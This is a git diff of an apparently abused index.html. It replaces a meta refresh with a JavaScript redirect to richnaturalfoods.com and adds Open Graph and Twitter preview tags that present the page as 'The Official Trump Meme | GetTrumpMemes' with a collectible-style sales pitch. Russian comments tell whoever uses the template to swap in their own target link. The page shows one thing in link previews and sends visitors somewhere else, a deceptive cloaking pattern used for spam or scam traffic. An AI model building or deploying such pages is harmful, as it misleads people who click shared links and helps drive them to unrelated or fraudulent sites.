--- a/index.html
+++ b/index.html
@@ -1,9 +1,24 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <meta http-equiv="refresh" content="0; url=https://richnaturalfoods.com">
+  <meta charset="utf-8"/>
+  <title>The Official Trump Meme | GetTrumpMemes</title>
+  <meta content="Join the Trump Community. Own a Piece of Trump. This is History in the Making!" name="description"/>
+  <!-- Open Graph теги для превью -->
+  <meta content="The Official Trump Meme | GetTrumpMemes" property="og:title"/>
+  <meta content="https://i.imgur.com/6dbLrYE.jpeg" property="og:image"/>
+  <!-- Twitter Card теги для превью -->
+  <meta content="The Official Trump Meme | GetTrumpMemes" property="twitter:title"/>
+  <meta content="https://i.imgur.com/6dbLrYE.jpeg" property="twitter:image"/>
+  <meta content="width=device-width, initial-scale=1" name="viewport"/>
+  <!-- Редирект через JavaScript -->
+  <script>
+    window.onload = function() {
+      window.location.href = "https://richnaturalfoods.com"; // Замени на свою целевую ссылку
+    }
+  </script>
 </head>
 <body>
-    <p>Redirecting...</p>
+  <p>Redirecting...</p>
 </body>
 </html>
